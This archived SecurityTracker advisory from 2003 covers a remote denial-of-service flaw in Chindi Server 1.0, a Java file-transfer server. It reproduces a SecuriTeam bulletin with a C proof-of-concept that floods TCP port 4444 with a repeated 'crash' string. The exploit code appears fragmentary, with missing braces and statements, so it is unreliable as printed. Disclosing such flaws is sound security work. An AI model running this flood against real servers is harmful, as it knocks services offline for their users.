Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (File Transfer/Sharing)  >   Chindi Vendors:   Konradsson, Mikael and Lundstrom, Viktor
Chindi Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006429
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 1 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Chindi Server version 1.0
Description:   A vulnerability was reported in the Chindi Server. A remote user can cause denial of service conditions on the server.

SecuriTeam distributed exploit code for a denial of service vulnerability in the Chindi Server. A remote user can apparently send a large number of characters (approximately 50,000) to the server on tcp port 4444 to cause the server to stop accepting any more connections.

The report credits Luca Ercoli.

Impact:   A remote user can cause the server to stop accepting connections.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [EXPL] Chindi DoS Exploit Code

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or
- - - - - - - - -

  Chindi DoS Exploit Code


Chindi is a server/client software package for encrypted file transfer 
written in Java.
A security vulnerability in the product allows remote attackers to cause a 
DoS attack.


Vulnerable systems: 
Chindi Server version 1.0

Exploit code:
* Chindi server 1.0  Denial of Service
* Proof of Concept by Luca Ercoli  luca.ercoli at
* After DoS, server appears to be up, but will not allow
* new connections.                                               *


#define PORT    4444
#define DOS     "crash"

int main(int argc, char *argv[]){

int nOpt,count,sockfd;
struct hostent *he;
struct sockaddr_in server_addr;

char *host;

printf ("\nChindi server 1.0 remote DoS\n\n");

if(argc < 2 ) {
                printf ("Usage: %s -t target\n",argv[0]);

while((nOpt = getopt(argc, argv, "t")) != -1) {

        switch(nOpt) {
                        case 't':
                        host = optarg;

if ((he = gethostbyname(argv[2])) == NULL)

server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr = *((struct in_addr *) he->h_addr);


if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct 
sockaddr)) == -1)

printf("1. Connected\n");
printf("2. Sending crash string\n");
printf("3. Verifing server status: ");

for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);


if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct 
sockaddr)) == -1)

else { printf("Server don't crash!\n"); exit(0); }



The information has been provided by  


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
In order to subscribe to the mailing list, simply forward this email to: 


The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages. 


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC